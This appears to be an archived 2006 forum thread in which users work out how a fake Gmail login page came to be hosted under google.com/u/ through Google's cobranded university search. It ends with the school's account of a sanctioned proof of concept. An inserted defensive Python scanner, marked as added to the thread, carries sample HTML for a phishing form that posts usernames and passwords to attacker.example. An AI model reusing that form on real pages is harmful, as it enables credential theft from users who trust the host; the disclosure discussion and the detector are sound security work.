Google exploit
September 15, 2006 3:52 AM

Can someone explain to me what this: http://www.google.com/u/gplus is all about? How is it done? Hint: you may not want to enter your real Google login details into the form.

This popped up on del.icio.us today. I'm trying to work out how someone scored a google.com/* address to run fake password-grabbing login page on. What's the trick?
posted by Jimbob to Computers & Internet (19 answers total) 2 users marked this as a favorite
 
Why do you say it's a fake?
posted by gleuschk at 4:21 AM on September 15, 2006


Well, because I doubt it's official Google corporate policy to set up a page claiming to be offering a "Limited Beta of Gmail Plus!" that sends you off to a remote domain that tells you the password you typed in.
posted by Jimbob at 4:23 AM on September 15, 2006


Ah, ok. I entered jimbob/wtf for the username/pwd, and got back
You (could have) gotten served!
jimbob = username you entered
wtf = password you entered
No data was actually taken, just displayed to you :) This is just a proof of concept of what a malicious user could do with this exploit.
The URL in the address bar is http://www.monthsbehind.net/google.php
posted by gleuschk at 4:26 AM on September 15, 2006


So to repeat JB's question, wtf is going on?
posted by wilful at 4:34 AM on September 15, 2006 [1 favorite]


That is really bizarre. It is not character spoofing because the trick still works if one types the URL into the address bar. The monthsbehind.com root directory is not helpful at all. Is this a prank by an internal Google employee?
posted by pheideaux at 4:39 AM on September 15, 2006


Usually in situations like this, I blame the interns.
posted by jessamyn at 4:43 AM on September 15, 2006 [1 favorite]


You can see the same effect with other pages under the u directory like this: Electronic visualization lab. This page Cobranded University Search seems to shed some light on to it. It's their university offering.
posted by jessamyn at 4:46 AM on September 15, 2006


Right, ucdavis.edu is mentioned in the source of the dodgy page.
posted by edd at 4:50 AM on September 15, 2006


The google /u/ pages are custom search pages for various organizations, especially universities and schools:

Google's own example.

The schools have total control over the content of those pages, so they can easily perform a hack like the gmailplus one. I'm glad someone demonstrated this exploit.
posted by jedrek at 4:52 AM on September 15, 2006


More here, here here and description of other schools in the program here, though gplus is not on the list.
posted by jessamyn at 4:52 AM on September 15, 2006


I'm not sure exactly what's going on here, and I suspect Google will take it down shortly.

Basically: google.com/u contains various legit Google pages.
For example, try /blah, /test or /2. The /test one mentions cobranded university search. Perhaps a mischievous university employee has access to upload a page to /gplus?
posted by matthewr at 4:55 AM on September 15, 2006


Whoa, I need to refresh more often and use preview.
posted by matthewr at 4:55 AM on September 15, 2006


I sent an email to the guy who has the monthsbehind domain registered to let him know that the link to that page is now out in the wild. His info is easy to find on whois, so this was probably some sort of example page and not an intentional nefarious hack.
posted by jessamyn at 5:03 AM on September 15, 2006


I send an email to the guy who has the domain registered to let him know that the link to that page is now out in the wild.

Heh, I wanted answers not action..! I guess this was all a lot simpler than I thought...
posted by Jimbob at 5:04 AM on September 15, 2006


Here's a link to the guy who uncovered it as a potential phishing loophole.
posted by peacay at 5:07 AM on September 15, 2006


Ah ha, now I get it, thanks to Peacay.

Google offers a service for universities to "brand" Google search by specifying their own header and footer.

This makes it possible, if you get onto that service, to insert a "header" and "footer" that makes the page look like a Gmail login, giving you your own google.com URL with a password form that can send the data to whatever site you like.

And they would have got away with it, too, if it wasn't for us darned kids!
posted by Jimbob at 5:14 AM on September 15, 2006
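A defender-side check for the loophole described above, added here as an example and not code from the thread or from Google: scan the user-supplied header/footer HTML of a cobranded page for any form that collects a password and submits to a host other than the page's own. The page URL, the sample HTML and the attacker.example host are constructed for the demo.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormScanner(HTMLParser):
    """Collect every <form>: its action attribute and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_credential_exfil_forms(page_url, html):
    """Return the absolute action URLs of password forms that post to a host other than page_url's.

    An empty or relative action resolves against page_url, so a form that posts
    back to the same host is not flagged; only a differing host is reported.
    """
    scanner = FormScanner()
    scanner.feed(html)
    page_host = urlsplit(page_url).hostname
    findings = []
    for form in scanner.forms:
        target = urljoin(page_url, form["action"])
        if form["has_password"] and urlsplit(target).hostname != page_host:
            findings.append(target)
    return findings


# Constructed sample: a cobranded-search "header" rewritten into a fake login page.
PAGE_URL = "http://www.google.com/u/gplus"
SAMPLE_HTML = """
<h1>Limited Beta of Gmail Plus!</h1>
<form action="http://attacker.example/collect.php" method="post">
  Username <input type="text" name="Email">
  Password <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form>
<form action="/u/gplus"><input type="text" name="q"><input type="submit" value="Search"></form>
"""
```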


Firefox 2 considers that link to be a phishing attempt.
posted by Coda at 5:56 PM on September 15, 2006


Yeah, I get a pop up warning me not to use the page at all. <3 Firefox.
posted by Salmonberry at 2:16 PM on September 16, 2006


I got an email back from the UC Davis people:

Dear Ms. West,

We appreciate your concern and you taking the time to contact us.

One of our programming students, Eric Farraro, discovered a security issue
for Google, on their military and university local search engine software,
which actually creates a security risk to Google servers and not the
military/university site.

He ran a legitimate test site to prove his point, under the guidance of his
supervisor, Charlie Turner. When he had proof, he contacted Google, who
immediately took down the specific functionality while they fix the bug.
(It is still down). Eric's site did not actually do any "phishing" - it
strictly returned the information to the person originating the login, to
let them know that had it been a real phishing site, their information would
have been taken and used without their knowledge.

His discovery will certainly save millions from a potentially huge
"phishing" exploit, as any phishing done using this security breach would be
using google's name as a "www.google.com/u/[put whatever you want here] URL
- which of course would be considered a trusted source by many.

Therefore, rest assured that this site was created with both the knowledge
of his supervisor and now of Google - who is working to correct the security
breach that Eric discovered.

Once again, thank you very much for your inquiry.

Sincerely,

Liz Gibson
posted by jessamyn at 7:13 PM on September 17, 2006

